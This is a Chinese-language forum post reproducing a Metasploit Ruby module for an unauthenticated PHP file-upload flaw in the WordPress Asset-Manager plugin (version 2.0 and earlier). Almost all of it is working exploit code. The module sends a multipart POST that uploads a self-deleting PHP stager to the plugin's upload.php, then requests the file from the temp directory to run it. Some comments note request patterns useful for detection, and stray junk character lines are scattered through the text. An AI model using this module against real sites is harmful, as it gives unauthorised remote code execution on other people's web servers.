
标题: WordPress Asset-Manager PHP文件上传漏洞

作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个Metasploit模块利用了在WordPress Asset-Manager插件2.0及以下版本中发现的漏洞：该插件允许上传PHP文件，用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
- I* X, p6 G3 q9 i" i
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
* m+ n" M8 x" N% Y ' n  d+ e( l  l8 v9 l
require 'msf/core'
require 'msf/core/exploit/php_exe'
& p; k/ l4 {% q/ S' S6 C 4 M, K. s4 Y6 x% X/ n/ o
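# Metasploit module for the unauthenticated file-upload weakness in the
# WordPress Asset-Manager plugin (<= 2.0).
#
# Observable behaviour, useful for detection engineering as much as for the
# exploit itself:
#   1. a multipart POST to wp-content/plugins/asset-manager/upload.php whose
#      single form field is named "Filedata" and carries a .php filename;
#   2. a follow-up GET for that filename under wp-content/uploads/assets/temp/.
# Either request on a host that does not legitimately serve the plugin is a
# strong signal; the stager deletes itself on execution (:unlink_self), so
# the temp directory may be empty by the time it is inspected.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Path, relative to TARGETURI, of the plugin's upload handler.
  UPLOAD_PATH = 'wp-content/plugins/asset-manager/upload.php'
  # Path, relative to TARGETURI, of the directory the handler stores uploads in.
  TEMP_DIR_PATH = 'wp-content/uploads/assets/temp/'

  # @param info [Hash] module metadata merged by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this URL is reproduced as given on the source page and
          # contains embedded spaces -- verify it against the upstream module.
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Entry point: uploads a self-deleting PHP stager, then requests it so the
  # web server executes it.
  # @raise [Msf::Exploit::Failed] via fail_with when either step does not
  #   return the expected reply
  def exploit
    base = normalized_base_uri
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self makes the stager remove its own file once it runs.
    php_payload = get_write_exec_payload(:unlink_self => true)

    upload_payload(base, peer, payload_name, php_payload)
    trigger_payload(base, peer, payload_name)
  end

  private

  # TARGETURI path with a guaranteed trailing slash. Builds a new string
  # rather than appending to the value returned by target_uri.
  # @return [String]
  def normalized_base_uri
    base = target_uri.path
    base.end_with?('/') ? base : "#{base}/"
  end

  # Builds the multipart/form-data body the handler expects: one part named
  # "Filedata" carrying the stager under the chosen filename.
  # @param payload_name [String] filename presented to the handler
  # @param php_payload [String] PHP stager source
  # @return [Array(Rex::MIME::Message, String)] the message (needed for its
  #   boundary) and the serialised body
  def build_upload_body(payload_name, php_payload)
    form = Rex::MIME::Message.new
    form.add_part(
      php_payload,
      "application/octet-stream",
      nil,
      "form-data; name=\"Filedata\"; filename=\"#{payload_name}\""
    )
    # Rex::MIME::Message#to_s places a CRLF before the first boundary marker;
    # drop it so the body begins at the boundary.
    body = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
    [form, body]
  end

  # POSTs the stager to the upload handler and verifies the reply.
  # Success is judged by a 200 whose body echoes the uploaded filename; the
  # filename is matched literally rather than through an unescaped regexp.
  # @raise [Msf::Exploit::Failed] via fail_with on any other outcome
  def upload_payload(base, peer, payload_name, php_payload)
    form, body = build_upload_body(payload_name, php_payload)

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{base}#{UPLOAD_PATH}",
      'ctype'   => "multipart/form-data; boundary=#{form.bound}",
      'data'    => body
    })

    return if res && res.code == 200 && res.body.to_s.include?(payload_name)

    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
  end

  # GETs the stored file so the server executes it. A missing response is
  # deliberately not treated as failure; only an explicit non-200 reply is.
  # @raise [Msf::Exploit::Failed] via fail_with on a non-200 reply
  def trigger_payload(base, peer, payload_name)
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{base}#{TEMP_DIR_PATH}#{payload_name}",
      'method'  => 'GET'
    })

    return unless res && res.code != 200

    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
  end
end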




